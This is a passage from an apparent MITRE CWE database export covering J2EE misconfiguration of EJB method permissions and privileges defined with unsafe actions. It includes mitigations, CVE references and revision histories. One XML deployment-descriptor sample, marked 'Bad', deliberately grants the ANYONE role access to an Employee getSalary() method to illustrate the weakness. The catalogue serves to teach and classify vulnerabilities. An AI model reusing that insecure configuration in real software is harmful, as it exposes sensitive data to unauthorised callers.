"SubmissionName": "Anonymous Tool Vendor (under NDA)",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations, Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2008-10-14",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-04-11",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "ASP.NET Misconfiguration: Identity Impersonation",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "266",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 1
|
[
[
"284",
"269",
"266",
"556"
]
] |
[] |
9
|
J2EE Misconfiguration: Weak Access Permissions for EJB Methods
|
Variant
|
Simple
|
Draft
|
If elevated access rights are assigned to EJB methods, then an attacker can take advantage of the permissions to exploit the product.
|
If the EJB deployment descriptor contains one or more method permissions that grant access to the special ANYONE role, it indicates that access control for the application has not been fully thought through or that the application is structured in such a way that reasonable access control restrictions are impossible.
| null | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Other"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Other"
]
}
] |
[
{
"Description": "Follow the principle of least privilege when assigning access rights to EJB methods. Permission to invoke EJB methods should not be granted to the ANYONE role.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"System Configuration"
],
"Strategy": null
}
] | null | null |
[
{
"EntryID": null,
"EntryName": "J2EE Misconfiguration: Weak Access Permissions",
"MappingFit": null,
"TaxonomyName": "7 Pernicious Kingdoms"
}
] | null |
[
{
"Authors": [
"Katrina Tsipenyuk",
"Brian Chess",
"Gary McGraw"
],
"Edition": null,
"ExternalReferenceID": "REF-6",
"Publication": "NIST Workshop on Software Security Assurance Tools Techniques and Metrics",
"PublicationDay": "07",
"PublicationMonth": "11",
"PublicationYear": "2005",
"Publisher": "NIST",
"Section": null,
"Title": "Seven Pernicious Kingdoms: A Taxonomy of Software Security Errors",
"URL": "https://samate.nist.gov/SSATTM_Content/papers/Seven%20Pernicious%20Kingdoms%20-%20Taxonomy%20of%20Sw%20Security%20Errors%20-%20Tsipenyuk%20-%20Chess%20-%20McGraw.pdf",
"URLDate": null
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "7 Pernicious Kingdoms",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Other_Notes, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-03-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2009-07-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2012-10-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Other_Notes",
"ModificationDate": "2014-06-23",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-04-11",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "J2EE Misconfiguration: Weak Access Permissions",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "266",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following deployment descriptor grants ANYONE permission to invoke the Employee EJB's method named getSalary().",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t<ejb-jar>\n\t\t...\n\t\t<assembly-descriptor>\n\t\t\t<method-permission>\n\t\t\t\t<role-name>ANYONE</role-name>\n\t\t\t\t<method>\n\t\t\t\t<ejb-name>Employee</ejb-name>\n\t\t\t\t<method-name>getSalary</method-name>\n\t\t\t</method-permission>\n\t\t</assembly-descriptor>\n\t\t...\n\t</ejb-jar>\n```",
"IntroText": null,
"Language": "XML",
"Nature": "Bad",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"269",
"266",
"9"
]
] |
[] |
267
|
Privilege Defined With Unsafe Actions
|
Base
|
Simple
|
Incomplete
|
A particular privilege, role, capability, or right can be used to perform unsafe actions that were not intended, even when it is assigned to the correct entity.
| null |
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "REALIZATION: This weakness is caused during implementation of an architectural security tactic.",
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Gain Privileges or Assume Identity"
],
"Likelihood": null,
"Note": "A user can access restricted functionality and/or sensitive information that may include administrative functionality and user accounts.",
"Scope": [
"Access Control"
]
}
] |
[
{
"Description": "Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-1",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": null
},
{
"Description": "Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": "MIT-17",
"Phase": [
"Architecture and Design",
"Operation"
],
"Strategy": "Environment Hardening"
}
] |
[
{
"Description": "Roles have access to dangerous procedures (Accessible entities).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1981",
"Reference": "CVE-2002-1981"
},
{
"Description": "Untrusted object/method gets access to clipboard (Accessible entities).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1671",
"Reference": "CVE-2002-1671"
},
{
"Description": "Gain privileges using functions/tags that should be restricted (Accessible entities).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-2204",
"Reference": "CVE-2004-2204"
},
{
"Description": "Traceroute program allows unprivileged users to modify source address of packet (Accessible entities).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2000-0315",
"Reference": "CVE-2000-0315"
},
{
"Description": "Bypass domain restrictions using a particular file that references unsafe URI schemes (Accessible entities).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2004-0380",
"Reference": "CVE-2004-0380"
},
{
"Description": "Script does not restrict access to an update command, leading to resultant disk consumption and filled error logs (Accessible entities).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1154",
"Reference": "CVE-2002-1154"
},
{
"Description": "\"public\" database user can use stored procedure to modify data controlled by the database owner (Unsafe privileged actions).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-1145",
"Reference": "CVE-2002-1145"
},
{
"Description": "User with capability can prevent setuid program from dropping privileges (Unsafe privileged actions).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2000-0506",
"Reference": "CVE-2000-0506"
},
{
"Description": "Allows attachment to and modification of privileged processes (Unsafe privileged actions).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2002-2042",
"Reference": "CVE-2002-2042"
},
{
"Description": "User with privilege can edit raw underlying object using unprotected method (Unsafe privileged actions).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2000-1212",
"Reference": "CVE-2000-1212"
},
{
"Description": "Inappropriate actions allowed by a particular role(Unsafe privileged actions).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1742",
"Reference": "CVE-2005-1742"
},
{
"Description": "Untrusted entity allowed to access the system clipboard (Unsafe privileged actions).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-1480",
"Reference": "CVE-2001-1480"
},
{
"Description": "Extra Linux capability allows bypass of system-specified restriction (Unsafe privileged actions).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-1551",
"Reference": "CVE-2001-1551"
},
{
"Description": "User with debugging rights can read entire process (Unsafe privileged actions).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2001-1166",
"Reference": "CVE-2001-1166"
},
{
"Description": "Non-root admins can add themselves or others to the root admin group (Unsafe privileged actions).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1816",
"Reference": "CVE-2005-1816"
},
{
"Description": "Users can change certain properties of objects to perform otherwise unauthorized actions (Unsafe privileged actions).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-2173",
"Reference": "CVE-2005-2173"
},
{
"Description": "Certain debugging commands not restricted to just the administrator, allowing registry modification and infoleak (Unsafe privileged actions).",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-2027",
"Reference": "CVE-2005-2027"
}
] | null |
[
{
"EntryID": null,
"EntryName": "Unsafe Privilege",
"MappingFit": null,
"TaxonomyName": "PLOVER"
}
] |
[
"58",
"634",
"637",
"643",
"648"
] |
[
{
"Authors": [
"Sean Barnum",
"Michael Gegick"
],
"Edition": null,
"ExternalReferenceID": "REF-76",
"Publication": null,
"PublicationDay": "14",
"PublicationMonth": "09",
"PublicationYear": "2005",
"Publisher": null,
"Section": null,
"Title": "Least Privilege",
"URL": "https://web.archive.org/web/20211209014121/https://www.cisa.gov/uscert/bsi/articles/knowledge/principles/least-privilege",
"URLDate": "2023-04-07"
}
] |
[
{
"Note": "\n\nNote: there are 2 separate sub-categories here:\n\n```\n\t\t- privilege incorrectly allows entities to perform certain actions\n\t\t- object is incorrectly accessible to entities with a given privilege\n```\n",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2006-07-19",
"SubmissionName": "PLOVER",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Maintenance_Notes, Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2008-11-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2009-12-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2010-06-21",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Demonstrative_Examples, Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
